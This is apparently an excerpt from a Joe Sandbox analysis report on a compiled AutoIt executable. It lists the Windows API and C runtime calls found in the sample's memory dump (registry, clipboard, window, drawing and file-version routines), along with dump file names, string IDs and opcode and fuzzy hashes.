                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseConnectCreateRegistry
                                                                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                • API String ID: 3217815495-966354055
                                                                                                                                                                                                                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                                                                                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                • API String ID: 225202481-3320066284
                                                                                                                                                                                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15083398-0
                                                                                                                                                                                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                 • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                • String ID: @$AutoIt v3 GUI
                                                                                                                                                                                                                • API String ID: 867697134-3359773793
                                                                                                                                                                                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
• Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
• Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
• Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
• Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
• Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
• Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
• Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
• Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
• Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
• Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
• Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
APIs
  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
• _fseek.LIBCMT ref: 00452B3B
• __wsplitpath.LIBCMT ref: 00452B9B
• _wcscpy.LIBCMT ref: 00452BB0
• _wcscat.LIBCMT ref: 00452BC5
• __wsplitpath.LIBCMT ref: 00452BEF
• _wcscat.LIBCMT ref: 00452C07
• _wcscat.LIBCMT ref: 00452C1C
• __fread_nolock.LIBCMT ref: 00452C53
• __fread_nolock.LIBCMT ref: 00452C64
• __fread_nolock.LIBCMT ref: 00452C83
• __fread_nolock.LIBCMT ref: 00452C94
• __fread_nolock.LIBCMT ref: 00452CB5
• __fread_nolock.LIBCMT ref: 00452CC6
• __fread_nolock.LIBCMT ref: 00452CD7
• __fread_nolock.LIBCMT ref: 00452CE8
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452D78
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
• Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
• Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
• Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
• Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1744303182-0
                                                                                                                                                                                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                                                                                • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                                                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                                                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                                                                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                • API String ID: 4163708885-3819984048
                                                                                                                                                                                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
